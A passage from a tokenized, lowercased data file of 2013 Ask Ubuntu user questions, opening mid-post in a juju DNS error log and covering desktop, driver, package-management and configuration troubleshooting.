21:02:55,193 unit : nova-compute/0 : unit.hook.api debug : get unit setting : 'private-address' 2013-05-06 21:03:25,361 unit : nova-compute/0 : hook.output error : traceback ( most recent call last ) : 2013-05-06 21:03:25,361 unit : nova-compute/0 : hook.output error : file `` < string > '' , line 10 , in < module > 2013-05-06 21:03:25,361 unit : nova-compute/0 : hook.output error : file `` /usr/lib/python2.7/dist-packages/dns/resolver.py '' , line 770 , in query 2013-05-06 21:03:25,362 unit : nova-compute/0 : hook.output error : 2013-05-06 21:03:25,362 unit : nova-compute/0 : hook.output error : raise_on_no_answer ) 2013-05-06 21:03:25,363 unit : nova-compute/0 : hook.output error : file `` /usr/lib/python2.7/dist-packages/dns/resolver.py '' , line 698 , in query 2013-05-06 21:03:25,363 unit : nova-compute/0 : hook.output error : 2013-05-06 21:03:25,366 unit : nova-compute/0 : hook.output error : timeout = self._compute_timeout ( start ) file `` /usr/lib/python2.7/dist-packages/dns/resolver.py '' , line 568 , in _compute_timeout raise timeout dns.exception.timeout 2013-05-06 21:03:25,589 unit : nova-compute/0 : unit.hook.api info : unable to resolve local ip address 2013-05-06 21:03:25,611 unit : nova-compute/0 : hook.output debug : hook cloud-compute-relation-changed exited , exit code traceback ( most recent call last ) : failure : juju.errors.charminvocationerror : error processing '/var/lib/juju/units/nova-compute-0/charm/hooks/cloud-compute-relation-changed ' : exit code 1. . 2013-05-06 21:03:25,611 unit : nova-compute/0 : hook.executor debug : hook error : /var/lib/juju/units/nova-compute-0/charm/hooks/cloud-compute-relation-changed error processing '/var /lib/juju/units/nova-compute-0/charm/hooks/cloud-compute-relation-changed ' : exit code 1 . 2013-05-06 21:03:25,612 unit : nova-compute/0 : unit.relation.lifecycle warning : error in cloud-compute-relation-changed hook : error processing '/var/lib/juju/units/nova-compute-0/c harm/hooks/cloud-compute-relation-changed ' : exit code 1 . 2013-05-06 21:03:25,612 unit : nova-compute/0 : unit.relation.lifecycle info : invoked error handler for cloud-compute-relation-changed hook 2013-05-06 21:03:25,811 unit : nova-compute/0 : statemachine debug : relationworkflowstate : transition error ( up - > error ) { 'error_message ' : `` error processing '/var/lib/juju/units/no va-compute-0/charm/hooks/cloud-compute-relation-changed ' : exit code 1 . `` , 'change_type ' : 'modified ' } 2013-05-06 21:03:25,811 unit : nova-compute/0 : statemachine debug : relationworkflowstate : execute action do_error 2013-05-06 21:03:25,812 unit : nova-compute/0 : hook.scheduler debug : stopping 2013-05-06 21:03:25,813 unit : nova-compute/0 : unit.relation.lifecycle debug : stopped relation : cloud-compute lifecycle 2013-05-06 21:03:25,944 unit : nova-compute/0 : statemachine debug : relationworkflowstate : transition complete error ( state error ) { 'error_message ' : `` error processing '/var/lib/juju /units/nova-compute-0/charm/hooks/cloud-compute-relation-changed ' : exit code 1 . `` , 'change_type ' : 'modified ' } 2013-05-06 21:03:25,949 unit : nova-compute/0 : hook.scheduler debug : hook error , stopping scheduler execution 2013-05-06 21:03:25,949 unit : nova-compute/0 : hook.scheduler info : stopped do i need to make some additions to the juju environment file for openstack , by defining environment for openstack ? in an attempt to fix above problem , i tried using a dns server on another system instead of using /etc/hosts to resolve dns names . my configured domain name on this new server is `` malik.net '' . name resolution works fine but juju assigns a different public address against each node 's installed service . e.g juju-status reports : public-address : node-aab2ccddeeff.localdomain whereas it should be public-address : node-aab2ccddeeff.malik.net . the nodes do not recognize the public address created by juju . then i had to make entries in /etc/hosts at each node by writing node ip 's and each_node_name.localdomain . i landed in the same relation error problem . by telling juju to use the right domain name might fix this issue , but i do not know how to do that .
291738	usb external hard drive unplugged but still shows up !	i am running on ubuntu 12.04 . i have physically unplugged an external hard drive from my laptop , but for some reason it is still shown as mounted in nautilus . when trying to get rid of it by unmounting there is a message that says '' umount : /media/my passport is not in the fstab ( and you are not root ) '' when replugging in the same external hard drive , the message says : '' error : error when getting information for file '/media/my passport ' : input/output error please select another viewer and try again . '' can someone please help me with solving this problem . i am a new user of ubuntu and i have no background whatsoever , i would really appreciate it if the instructions are easy to understand . thanks ! !
291739	no sound on ubuntu 13.04	i have just upgraded to ubuntu 13.04 from 12.10 and i lost the sound on my laptop . there was sound in the beginning , but after another restart , it was gone . all media players wo n't play music , no sound from movies or youtube , sound test is negative however the system detects that there is a `` built-in audio '' device . there is no output on the speakers and no input from the microphone is detected . how can i fix this problem ?
291744	how to enable the ubuntu tweak login settings section ?	i have installed ubuntu tweak and found its tweaks - startup - login settings section disabled ( i can open it but everything is shaded out and nothing works inside ) . how can it be enabled ?
291746	use gnome-shell in ubuntu studio ( or ubuntu studio functionality in vanilla ubuntu )	problem i am thinking about installing ubuntu studio on my new laptop , basically because jack coexists with pulseaudio `` out of the box '' which i have found impossible to achieve in a previous installation . also , it uses the low-latency kernel by default . however , i 'd also like to keep using gnome shell . hardware : lenovo t430 . own attempts i have tried apt-get install gnome-shell gnome-session but this brings along more than 100 extra packages , some of which i am not sure i really need . in addition , it asks if gdm should be the default display manager ( instead of lightdm ) , however , according to wikipedia , the former is the newer and better alternative . after keeping lightdm and changing the greeter to use the unity greeter ( the default greeter does n't seem to recognize the new session types ) , i can log in to unity but not to the good old gnome shell . this is just a brief summary of several hours of reinstalling ubuntu studio and trying to make things work . question what is the most robust path to achieve the desired result -- an installation with a low-latency kernel and working jack , with gnome shell ? install ubuntu studio + ? ? ? , how to configure ? install vanilla ubuntu , add some packages from ubuntu studio , how to configure rt+jack ? ? ? ? related this related question suggests installing ubuntu-desktop , but for 12.04 . this answer points to an instruction to add ubuntu studio features to vanilla ubuntu . i have n't yet tried either of these options .
291750	hotkeys for totem in ubuntu 12.04	i 'm looking for a way to control the playback of totem movie player even when i 'm not focused on the window itself . i have done it with vlc using the instructions on the following link : http : //wiki.videolan.org/how_to_use_vlc_for_transcription_in_linux . however , vlc distorts the audio quality of the files i want to play ( both .wma and .ogg files ) . totem gives me great quality , but i have to be focused on the window to be able to control the playback . any advice , or do i just have to stick with vlc ?
291752	what 's the right way to remove an ubuntu unity web application ?	after i 've tried sudo apt-get remove -- purge unity-webapps-googleplus the application was not removed completely - say the state was not reverted to which it was before i have installed it . i can notice 2 effects : it is still present in the main menu ( i have installed an indicator to display it ) `` others '' section and the browser does n't ask me to install it when i visit the site ( even after i have manually removed it from dontask-domains and allowed-domains in dconf ) . after i 've tried dragging an amazon icon to the trash can icon , the amazon web application is still present in the main menu `` others '' section . so how does one remove an ubuntu unity web application cleanly ? update : dpkg -l | grep webapps gives ii libunity-webapps0 2.5.0~daily13.03.18-0ubuntu1 i386 web apps integration with the unity desktop ii unity-webapps-common 2.4.14-0ubuntu1 all unity webapp integration scripts ii unity-webapps-service 2.5.0~daily13.03.18-0ubuntu1 i386 service for web apps integration with the unity desktop
291759	wireless driver channel -1 patch not building	i 'm attempting to patch my wifi driver to fix the fixed channel -1 error , but i always get make errors when i try to compile the source ... i 'm running ubuntu x64 13.04 on an amd box . any help would be appreciated ... $ sudo make make -c /lib/modules/3.8.0-19-generic/build m=/usr/src/compat-wireless-3.4-rc3-1 modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.8.0-19-generic' cc [ m ] /usr/src/compat-wireless-3.4-rc3-1/drivers/bcma/main.o in file included from /usr/src/compat-wireless-3.4-rc3-1/include/linux/bcma/bcma.h:8:0 , from /usr/src/compat-wireless-3.4-rc3-1/drivers/bcma/bcma_private.h:9 , from /usr/src/compat-wireless-3.4-rc3-1/drivers/bcma/main.c:8 : /usr/src/compat-wireless-3.4-rc3-1/include/linux/bcma/bcma_driver_pci.h:207:23 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘bcma_core_pci_init’ in file included from /usr/src/compat-wireless-3.4-rc3-1/drivers/bcma/main.c:8:0 : /usr/src/compat-wireless-3.4-rc3-1/drivers/bcma/bcma_private.h:17:15 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘bcma_bus_register’ /usr/src/compat-wireless-3.4-rc3-1/drivers/bcma/main.c:142:15 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘bcma_bus_register’ /usr/src/compat-wireless-3.4-rc3-1/drivers/bcma/main.c:17:21 : warning : ‘bcma_bus_next_num’ defined but not used [ -wunused-variable ] /usr/src/compat-wireless-3.4-rc3-1/drivers/bcma/main.c:86:12 : warning : ‘bcma_register_cores’ defined but not used [ -wunused-function ] make [ 3 ] : *** [ /usr/src/compat-wireless-3.4-rc3-1/drivers/bcma/main.o ] error 1 make [ 2 ] : *** [ /usr/src/compat-wireless-3.4-rc3-1/drivers/bcma ] error 2 make [ 1 ] : *** [ _module_/usr/src/compat-wireless-3.4-rc3-1 ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.8.0-19-generic' make : *** [ modules ] error 2
291760	what are the places where does ubunty saves recent user activity and tools to clean them ?	i 'd like to clear ( and disable tracking if possible ) all the recent user activity tracking ( like most recently accessed files ( mru ) and applications , thumbnail caching etc. ) . the only thing i do not want to flush is the bash commands history . i 've taken a look at ubntu tweak 's `` jaintor '' section but it is disk space centric ( rather than privacy centric ) and the only thing of these it cleans is the thumbnails cache ( alongside with apt cache etc. ) . any suggestions ?
291761	how to get right-click scripts working in nautilus 3.6 ( ubuntu 13.04 )	you can add scripts for clicking on files/folders by placing them in the ~/.local/share/nautilus/scripts/ directory . but the old way of placing right-click scripts in ~/.gnome2/nautilus-scripts that would work when you right clicked anywhere in the nautilus window no longer works . this was also an unanswered question in a comment here
291763	get $ home and/or username without using c++	i 'm working on the music app and i need to know how to get the user name and/or home dir of the users . i 've googled around for a while but can only find the variables for c++ or bash . how do i get the user name or his/her home dir ?
291764	many dhclient processes running ?	is it ok to have many dhclient processes running ? or is this an error and you should always have one such a process ? what does it mean ? why is it listening ? is this computer a dhcp client or is it a dhcp server waiting for requests from dhcp clients ? netstat -nlpl active internet connections ( only servers ) proto recv-q send-q local address foreign address state pid/program name tcp 0 0 192.168.1.3:25 0.0.0.0 : * listen 4929/sendmail : mta : tcp 0 0 127.0.0.1:3306 0.0.0.0 : * listen 1284/mysqld tcp 0 0 127.0.0.1:587 0.0.0.0 : * listen 4929/sendmail : mta : tcp 0 0 127.0.1.1:53 0.0.0.0 : * listen 1388/dnsmasq tcp 0 0 0.0.0.0:22 0.0.0.0 : * listen 1098/sshd tcp 0 0 127.0.0.1:631 0.0.0.0 : * listen 969/cupsd tcp6 0 0 : ::7676 : : : * listen 3733/java tcp6 0 0 : ::41474 : : : * listen 3733/java tcp6 0 0 : ::45221 : : : * listen 3733/java tcp6 0 0 : ::52009 : : : * listen 3733/java tcp6 0 0 : ::8686 : : : * listen 3733/java tcp6 0 0 : ::80 : : : * listen 3733/java tcp6 0 0 : ::4848 : : : * listen 3733/java tcp6 0 0 : ::3700 : : : * listen 3733/java tcp6 0 0 : ::8181 : : : * listen 3733/java tcp6 0 0 : ::22 : : : * listen 1098/sshd tcp6 0 0 : :1:631 : : : * listen 969/cupsd udp 0 0 0.0.0.0:22242 0.0.0.0 : * 1388/dnsmasq udp 0 0 0.0.0.0:14156 0.0.0.0 : * 1388/dnsmasq udp 0 0 0.0.0.0:22435 0.0.0.0 : * **1036/dhclient** udp 0 0 0.0.0.0:7146 0.0.0.0 : * 1388/dnsmasq udp 0 0 127.0.1.1:53 0.0.0.0 : * 1388/dnsmasq udp 0 0 0.0.0.0:68 0.0.0.0 : * **6833/dhclient** udp 0 0 0.0.0.0:68 0.0.0.0 : * **1036/dhclient** udp 0 0 0.0.0.0:45662 0.0.0.0 : * 957/avahi-daemon : r udp 0 0 0.0.0.0:5353 0.0.0.0 : * 957/avahi-daemon : r udp 0 0 0.0.0.0:29971 0.0.0.0 : * **6833/dhclient** udp6 0 0 : ::43897 : : : * 957/avahi-daemon : r udp6 0 0 : ::16303 : : : * **6833/dhclient** udp6 0 0 : ::5353 : : : * 957/avahi-daemon : r udp6 0 0 : ::29968 : : : * **1036/dhclient** raw 17600 0 0.0.0.0:1 0.0.0.0 : * 7 6365/ping raw 26816 0 0.0.0.0:1 0.0.0.0 : * 7 6364/ping raw 29120 0 0.0.0.0:1 0.0.0.0 : * 7 6356/ping raw 35264 0 0.0.0.0:1 0.0.0.0 : * 7 6270/ping
291765	chrome wo n't work and wo n't let me uninstall it	at one point i was using chrome and then one day it just stopped working . all of a sudden it would open but the `` oh snap '' warning would come up . it does n't matter what i do , it only shows the `` oh snap '' page . i wanted to uninstall chrome and then re-install it but as much as it shows up in dash home as installed , it does not show up in the software center so i can un-install it . i did find the chrome folder ( filesystem/opt/google ) but even when i try to trash it ( shift+delete ) it does nothing and i ca n't delete it . is there a way to get rid of it ( cleanly ) so i can attempt to re-install it ? if i attempt to install a new version of chrome does it overwrite the old one ? ( and how do i do that since it 's not showing up on usc ? ) is there a kind of compatibility issue having both browsers installed ? i am using ubuntu 12.04 lts from an usb on a hp pavillion laptop . s1 s2 s3
291775	gnome terminal hotkey change globally via cli	gnome terminal has an option to turn off f10 and menu access hotkeys . i 've also found out that this option can also be adjusted at /apps/gnome-terminal/global/use_menu_accelerators and /apps/gnome-terminal/global/use_mnemonics in gconf-editor . my question is that how can i make this change from the command line globally for each user i 'm interested in an ubuntu 13.04 solution but i the answer seems to be the same for 12.04 at first sight .
291787	lib64readline6 conflicts	i 've recently upgraded to a 64-bit machine ( kubuntu 12.04.02 amd64 ) and in trying to assemble the list of things to compile some things i get conflicts . in trying to install lib64readline6 or lib64readline6-dev i get : the following packages have unmet dependencies : lib64readline6 : i386 : depends : lib64tinfo5 : i386 but it is not going to be installed depends : libc6-amd64 : i386 ( > = 2.11 ) but it is not going to be installed i variously also try to include libc6-i386 ( 32 bit library for amd64 ) as well as other combinations of things but i still get the conflicts .
291788	virtualbox error	my ubuntu computer wo n't load virtualbox . the message i 'm recieving is : error : failed to create the virtualbox com object . the application will now terminate . start tag expected , ' & lt ; ' not found . location : '/home/josh/.virtualbox/virtualbox.xml ' , line 1 ( 0 ) , column 1 . /build/buildd/virtualbox-4.1.18-dfsg/src/vbox/main/src-server/virtualboximpl.cpp [ 484 ] ( nsresult virtualbox : :init ( ) ) result code : ns_error_failure ( 0x80004005 ) component : virtualbox interface : ivirtualbox { c28be65f-1a8f-43b4-81f1-eb60cb516e66 } my computer is currently running ubuntu 12.10 .
291798	glade gui in python 2.7 crashes	i created a simple program using a glade .xml file and it , whenever i run the program , it crashes ! here 's the python code : # ! /usr/bin/env python import pygtk pygtk.require ( `` 2.0 '' ) import gtk class tutorialapp ( object ) : def __init__ ( self ) : builder = gtk.builder ( ) builder.add_from_file ( `` tutorial.xml '' ) builder.connect_signals ( { `` on_window_destroy '' : gtk.main_quit } ) self.window = builder.get_object ( `` window '' ) self.window.show ( ) if __name__ == `` __main__ '' : app = tutorialapp ( ) gtk.main ( ) the .xml file is rather extensive , so i ca n't post it in a readable form , but here it is . < ? xml version= '' 1.0 '' encoding= '' utf-8 '' ? > < interface > < ! -- interface-requires gtk+ 3.0 -- > < object class= '' gtkwindow '' id= '' window1 '' > < property name= '' can_focus '' > false < /property > < child > < object class= '' gtkbox '' id= '' box1 '' > < property name= '' visible '' > true < /property > < property name= '' can_focus '' > false < /property > < property name= '' orientation '' > vertical < /property > < child > < object class= '' gtkmenubar '' id= '' menubar1 '' > < property name= '' visible '' > true < /property > < property name= '' can_focus '' > false < /property > < child > < object class= '' gtkmenuitem '' id= '' menuitem1 '' > < property name= '' use_action_appearance '' > false < /property > < property name= '' visible '' > true < /property > < property name= '' can_focus '' > false < /property > < property name= '' label '' translatable= '' yes '' > _file < /property > < property name= '' use_underline '' > true < /property > < child type= '' submenu '' > < object class= '' gtkmenu '' id= '' menu1 '' > < property name= '' visible '' > true < /property > < property name= '' can_focus '' > false < /property > < child > < object class= '' gtkimagemenuitem '' id= '' imagemenuitem1 '' > < property name= '' label '' > gtk-new < /property > < property name= '' use_action_appearance '' > false < /property > < property name= '' visible '' > true < /property > < property name= '' can_focus '' > false < /property > < property name= '' use_underline '' > true < /property > < property name= '' use_stock '' > true < /property > < /object > < /child > < child > < object class= '' gtkimagemenuitem '' id= '' imagemenuitem2 '' > < property name= '' label '' > gtk-open < /property > < property name= '' use_action_appearance '' > false < /property > < property name= '' visible '' > true < /property > < property name= '' can_focus '' > false < /property > < property name= '' use_underline '' > true < /property > < property name= '' use_stock '' > true < /property > < /object > < /child > < child > < object class= '' gtkimagemenuitem '' id= '' imagemenuitem3 '' > < property name= '' label '' > gtk-save < /property > < property name= '' use_action_appearance '' > false < /property > < property name= '' visible '' > true < /property > < property name= '' can_focus '' > false < /property > < property name= '' use_underline '' > true < /property > < property name= '' use_stock '' > true < /property > < /object > < /child > < child > < object class= '' gtkimagemenuitem '' id= '' imagemenuitem4 '' > < property name= '' label '' > gtk-save-as < /property > < property name= '' use_action_appearance '' > false < /property > < property name= '' visible '' > true < /property > < property name= '' can_focus '' > false < /property > < property name= '' use_underline '' > true < /property > < property name= '' use_stock '' > true < /property > < /object > < /child > < child > < object class= '' gtkseparatormenuitem '' id= '' separatormenuitem1 '' > < property name= '' use_action_appearance '' > false < /property > < property name= '' visible '' > true < /property > < property name= '' can_focus '' > false < /property > < /object > < /child > < child > < object class= '' gtkimagemenuitem '' id= '' imagemenuitem5 '' > < property name= '' label '' > gtk-quit < /property > < property name= '' use_action_appearance '' > false < /property > < property name= '' visible '' > true < /property > < property name= '' can_focus '' > false < /property > < property name= '' use_underline '' > true < /property > < property name= '' use_stock '' > true < /property > < /object > < /child > < /object > < /child > < /object > < /child > < child > < object class= '' gtkmenuitem '' id= '' menuitem2 '' > < property name= '' use_action_appearance '' > false < /property > < property name= '' visible '' > true < /property > < property name= '' can_focus '' > false < /property > < property name= '' label '' translatable= '' yes '' > _edit < /property > < property name= '' use_underline '' > true < /property > < child type= '' submenu '' > < object class= '' gtkmenu '' id= '' menu2 '' > < property name= '' visible '' > true < /property > < property name= '' can_focus '' > false < /property > < child > < object class= '' gtkimagemenuitem '' id= '' imagemenuitem6 '' > < property name= '' label '' > gtk-cut < /property > < property name= '' use_action_appearance '' > false < /property > < property name= '' visible '' > true < /property > < property name= '' can_focus '' > false < /property > < property name= '' use_underline '' > true < /property > < property name= '' use_stock '' > true < /property > < /object > < /child > < child > < object class= '' gtkimagemenuitem '' id= '' imagemenuitem7 '' > < property name= '' label '' > gtk-copy < /property > < property name= '' use_action_appearance '' > false < /property > < property name= '' visible '' > true < /property > < property name= '' can_focus '' > false < /property > < property name= '' use_underline '' > true < /property > < property name= '' use_stock '' > true < /property > < /object > < /child > < child > < object class= '' gtkimagemenuitem '' id= '' imagemenuitem8 '' > < property name= '' label '' > gtk-paste < /property > < property name= '' use_action_appearance '' > false < /property > < property name= '' visible '' > true < /property > < property name= '' can_focus '' > false < /property > < property name= '' use_underline '' > true < /property > < property name= '' use_stock '' > true < /property > < /object > < /child > < child > < object class= '' gtkimagemenuitem '' id= '' imagemenuitem9 '' > < property name= '' label '' > gtk-delete < /property > < property name= '' use_action_appearance '' > false < /property > < property name= '' visible '' > true < /property > < property name= '' can_focus '' > false < /property > < property name= '' use_underline '' > true < /property > < property name= '' use_stock '' > true < /property > < /object > < /child > < /object > < /child > < /object > < /child > < child > < object class= '' gtkmenuitem '' id= '' menuitem3 '' > < property name= '' use_action_appearance '' > false < /property > < property name= '' visible '' > true < /property > < property name= '' can_focus '' > false < /property > < property name= '' label '' translatable= '' yes '' > _view < /property > < property name= '' use_underline '' > true < /property > < /object > < /child > < child > < object class= '' gtkmenuitem '' id= '' menuitem4 '' > < property name= '' use_action_appearance '' > false < /property > < property name= '' visible '' > true < /property > < property name= '' can_focus '' > false < /property > < property name= '' label '' translatable= '' yes '' > _help < /property > < property name= '' use_underline '' > true < /property > < child type= '' submenu '' > < object class= '' gtkmenu '' id= '' menu3 '' > < property name= '' visible '' > true < /property > < property name= '' can_focus '' > false < /property > < child > < object class= '' gtkimagemenuitem '' id= '' imagemenuitem10 '' > < property name= '' label '' > gtk-about < /property > < property name= '' use_action_appearance '' > false < /property > < property name= '' visible '' > true < /property > < property name= '' can_focus '' > false < /property > < property name= '' use_underline '' > true < /property > < property name= '' use_stock '' > true < /property > < /object > < /child > < /object > < /child > < /object > < /child > < /object > < packing > < property name= '' expand '' > false < /property > < property name= '' fill '' > true < /property > < property name= '' position '' > 0 < /property > < /packing > < /child > < child > < object class= '' gtkscrolledwindow '' id= '' scrolledwindow1 '' > < property name= '' visible '' > true < /property > < property name= '' can_focus '' > true < /property > < property name= '' shadow_type '' > in < /property > < child > < object class= '' gtktextview '' id= '' textview1 '' > < property name= '' visible '' > true < /property > < property name= '' can_focus '' > true < /property > < /object > < /child > < /object > < packing > < property name= '' expand '' > true < /property > < property name= '' fill '' > true < /property > < property name= '' position '' > 1 < /property > < /packing > < /child > < child > < object class= '' gtkstatusbar '' id= '' statusbar1 '' > < property name= '' visible '' > true < /property > < property name= '' can_focus '' > false < /property > < property name= '' orientation '' > vertical < /property > < property name= '' spacing '' > 2 < /property > < /object > < packing > < property name= '' expand '' > false < /property > < property name= '' fill '' > true < /property > < property name= '' position '' > 2 < /property > < /packing > < /child > < /object > < /child > < /object > < /interface > maybe i can get help , if not i 'll continue trying to debug it on my own .
291808	how to restore $ path environment variable ?	i did this in the console : unset path after this i started getting this error : grep : command not found is there any easy way to get all environment variables back ?
291813	tried to update from lucid lynx , now computer wo n't boot	i do n't know much about my computer , i have been trying to get an old custom computer updated . it was running on lucid lynx , i tried to update from the terminal with some 'copy and pasted ' 'sudo get upgrade ' , i 'm not sure what exactly i put in the terminal but it looked like it was doing its thing , then it got hung up somewhere and i mistakenly tried to resart . now when i turn the computer on it goes to the 'ubuntu ' loading screen but never completely boots . i 'm sad , and have no idea what to do , and am way beyond my understanding ... . please help
291819	why does n't tty7 show a prompt with no display manager ?	when i drop to tty1-tty6 through ctrl-alt-f [ 1-6 ] it shows a prompt , for obvious reasons ( it 's supposed to ) . however , if i kill my display server , and thus x , through something like sudo service gdm stop tty7 is just blank . from my understanding x is started with startx , so i 'm wondering why tty7 does n't drop back to a prompt when x terminates . note : my knowledge of x and display servers is relatively limited .
291822	how bad are duplicate entries in sources.list ?	what is sources.list ? is it like 'registry ? ' how important is it it to keep it 'clean ? ' when i did sudo apt-get update the last lines to display were these : w : duplicate sources.list entry http : //archive.canonical.com/ubuntu/ raring/partner amd64 packages ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_raring_partner_binary-amd64_packages ) w : duplicate sources.list entry http : //archive.canonical.com/ubuntu/ raring/partner i386 packages ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_raring_partner_binary-i386_packages ) w : you may want to run apt-get update to correct these problems do i need to eliminate these ? if so , do i just find that file , back it up , and use gedit to edit ? edit for erik : /etc/apt/sources.list : # # 'partner ' repository . /etc/apt/sources.list : deb http : //archive.canonical.com/ubuntu raring partner /etc/apt/sources.list : # deb-src http : //archive.canonical.com/ubuntu raring partner /etc/apt/sources.list : # # 'partner ' repository . /etc/apt/sources.list : deb http : //archive.canonical.com/ubuntu raring partner /etc/apt/sources.list : # deb-src http : //archive.canonical.com/ubuntu raring partner /etc/apt/sources.list.save : # # 'partner ' repository . /etc/apt/sources.list.save : deb http : //archive.canonical.com/ubuntu raring partner /etc/apt/sources.list.save : # deb-src http : //archive.canonical.com/ubuntu raring partner /etc/apt/sources.list.save : # # 'partner ' repository . /etc/apt/sources.list.save : deb http : //archive.canonical.com/ubuntu raring partner /etc/apt/sources.list.save : # deb-src http : //archive.canonical.com/ubuntu raring partner thanks eric !
291824	ubuntu can not start after upgrade 12.04 to 12.10	yesterday i upgrade ubuntu 12.04 to ubuntu 12.10 . after restart with ubuntu 12.10 launcher and top menu were n't shown . so i tried to solve this problem . when i googled this problem i found a solution in ask ubuntu form . i did that solution which link is in below : ubuntu 12.10 shows no launcher or menu i followed the solition in step one . after i did this i restart my computer and now ubuntu can not launch . these errors are given : sck from util-linux 2.20.1 /dev/sda5 : clean 292675/14319616 files , 5132792/57276672 blocks the disk drive for media/elements is not ready yet or not present keys : continue to wait , or press s to skip mounting or m for manual recovery spqwing maintenance shell after pressing m this error is given : filesystem check ot mount failed a maintenance shell will now be started control-d will terminate this shell and continue booting after re-trying filesystem any futher errors will be ignored mountall start starting then system locked . can anyone help me to solve this problem ?
291826	software-center crashes in ubuntu 12.10	i 'm having a problem with ubuntu software center . when i open it , it closes automatically without any permissions . when i run it in a terminal i get this : vangjush @ vangjush : ~ $ software-center 2013-05-06 21:41:29,532 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2013-05-06 21:41:29,540 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true 2013-05-06 21:41:30,052 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2013-05-06 21:41:30,061 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/lib/python2.7/dist-packages/gi/importer.py ' , 51 , 'find_module ' ) ' 2013-05-06 21:41:30,061 - root - error - could not find any typelib for launchpadintegration 2013-05-06 21:41:30,217 - softwarecenter.ui.gtk3.app - info - show_available_packages : search_text is '' , app is none . 2013-05-06 21:41:30,555 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 257 , in open self._cache = apt.cache ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 102 , in __init__ self.open ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 149 , in open self._list.read_main_list ( ) systemerror : e : malformed line 57 in source list /etc/apt/sources.list ( dist parse ) 2013-05-06 21:41:31,504 - softwarecenter.db.enquire - error - _get_estimate_nr_apps_and_nr_pkgs failed traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 115 , in _get_estimate_nr_apps_and_nr_pkgs tmp_matches = enquire.get_mset ( 0 , len ( self.db ) , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 277 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__' traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 182 , in < module > app.run ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1387 , in run self.show_available_packages ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1325 , in show_available_packages self.view_manager.set_active_view ( viewpages.available ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/viewmanager.py '' , line 151 , in set_active_view view_widget.init_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/availablepane.py '' , line 173 , in init_view self.cache , self.db , self.icons , self.apps_filter ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py '' , line 80 , in __init__ self.build ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py '' , line 324 , in build self._build_homepage_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py '' , line 119 , in _build_homepage_view self._append_whats_new ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py '' , line 253 , in _append_whats_new whats_new_cat = self._update_whats_new_content ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py '' , line 238 , in _update_whats_new_content docs = whats_new_cat.get_documents ( self.db ) file `` /usr/share/software-center/softwarecenter/db/categories.py '' , line 131 , in get_documents nonblocking_load=false ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 330 , in set_query self._blocking_perform_search ( ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 225 , in _blocking_perform_search matches = enquire.get_mset ( 0 , self.limit , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 277 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__' what 's wrong ? how can i fix it ?
291828	apt-get and dependencies	i thought apt-get was a package manager that installs all dependencies by default when it installs an application . but when i tried installing gcc-4.7 , i get this : sudo apt-get install gcc-4.7 reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : gcc-4.7 : depends : cpp-4.7 ( = 4.7.3-2ubuntu1~12.04 ) but it is not going to be installed depends : libgcc-4.7-dev ( = 4.7.3-2ubuntu1~12.04 ) but it is not going to be installed libstdc++6-4.7-dev : depends : libgcc-4.7-dev ( = 4.7.3-2ubuntu1~12.04 ) but it is not going to be installed why didnt it install the `` unmet dependencies '' ?
291829	sharing evolution mail local folders	is it possible to share the local folders from one evolution client to another ? how ? thanks .
